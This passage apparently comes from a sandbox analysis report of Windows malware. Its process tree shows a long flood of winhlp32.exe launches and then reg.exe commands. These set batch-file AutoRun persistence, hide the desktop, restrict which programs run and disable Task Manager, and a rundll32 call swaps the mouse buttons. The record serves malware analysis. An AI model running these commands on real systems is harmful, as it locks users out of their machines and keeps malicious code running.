    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14420
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14432
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14444
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14508
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14520
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14532
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14544
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14556
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14568
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14576
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14588
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14640
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14652
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14664
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14792
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14816
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14828
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14840
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14920
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14948
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:14960
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:15032
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:15480
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:17344
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:17984
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:17980
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:18000
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:4456
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:4288
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:18236
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:13040
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:18452
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:18488
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:18496
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:18608
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:18636
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:18660
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:18736
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:18772
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:18788
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:18860
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19168
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19192
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19236
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19248
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19260
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19272
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19324
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19340
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19356
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19368
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19424
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:6840
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:4700
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:18764
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:18968
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19208
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19600
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19608
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19620
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19660
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19672
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19696
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19712
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19892
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19904
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19920
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19948
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19960
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19972
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19980
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19992
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20064
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20076
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20088
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20100
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20108
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20164
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20176
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20188
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20204
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20216
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20228
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20240
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20260
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20280
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20292
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20348
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20356
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20372
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20384
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20420
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20432
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:5928
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19204
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:2068
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:4064
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20992
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21012
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21024
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21052
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21064
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21076
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21104
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21116
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21128
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21140
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21164
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21176
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21188
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21200
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21256
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21288
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21356
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21424
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21432
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21456
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21464
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21480
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20872
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:20976
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21312
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21580
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21604
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21612
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21624
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21644
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21660
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21672
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21684
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21768
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21804
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21820
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21840
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21860
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21912
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21976
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22000
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22020
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22044
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22052
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22064
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22076
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22096
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22148
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22160
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22280
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22288
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22308
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22324
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22364
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22384
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22396
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22408
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22420
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22436
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22448
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22464
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22480
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22496
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22508
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22524
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19044
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:19088
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:21336
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22532
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22544
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22560
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22644
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22676
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22736
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22748
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22788
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22848
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22896
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22904
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22940
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22976
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:22996
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23056
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23072
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23088
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23104
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23116
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23152
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23228
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23236
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23248
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23260
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23324
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23348
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23360
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23384
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23392
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23404
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23420
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23500
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23592
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23612
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23632
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23644
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23652
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23664
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23684
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23744
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23760
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23768
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23780
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23788
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23800
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23844
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23872
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23884
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23924
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23952
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:23964
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24008
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24020
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24052
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24060
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24072
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24100
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24116
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24128
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24144
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24192
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24204
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24220
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24280
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24300
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24348
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24360
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24404
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24460
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24472
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24600
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24612
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24624
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24660
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24676
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24848
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24868
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24892
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24900
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24916
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24936
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24948
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24964
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25552
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25576
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25592
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24252
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:24772
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:17696
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25612
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25632
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25640
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25652
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25668
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25680
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25688
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25704
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25716
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25736
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25748
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25760
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25772
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25784
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25796
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25816
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25828
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25844
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:25864
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:26704
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:26960
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:26988
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:27008
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:27020
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:27028
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:27044
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:27056
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:27064
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29088
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29136
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29188
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29204
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29216
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29240
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29280
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29296
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29316
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29336
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29356
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29372
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29392
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29404
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29416
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29428
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29596
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29620
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29640
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29652
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29664
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29676
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29692
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:18424
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29000
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:18152
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:18120
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:4044
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29708
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29720
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29732
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29744
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:29760
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:30136
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\celeryfixv5.bat" /f
      4⤵
      PID:2060
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
      4⤵
      PID:2736
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REGDWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:320
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REGDWORD /d C:\Windows\explorer.exe /f
      4⤵
      Modifies registry key
      PID:4940
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d Sakpot /F
      4⤵
      Modifies registry key
      PID:2016
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:2012
  - - C:\Windows\system32\reg.exe
      reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:4336
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
      4⤵
      Modifies registry key
      PID:4872
  - - C:\Windows\system32\rundll32.exe
      C:\Windows/system32/rundll32 user32, SwapMouseButton
      4⤵
      PID:6508
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REGSZ /d "C:\Windows\syste m32\batinit.bat" /f
      4⤵
      PID:7156
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:6532
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8328
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8340
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8352
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8364
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8400
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8492
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8508
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8520
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8600
  - - C:\Windows\winhlp32.exe
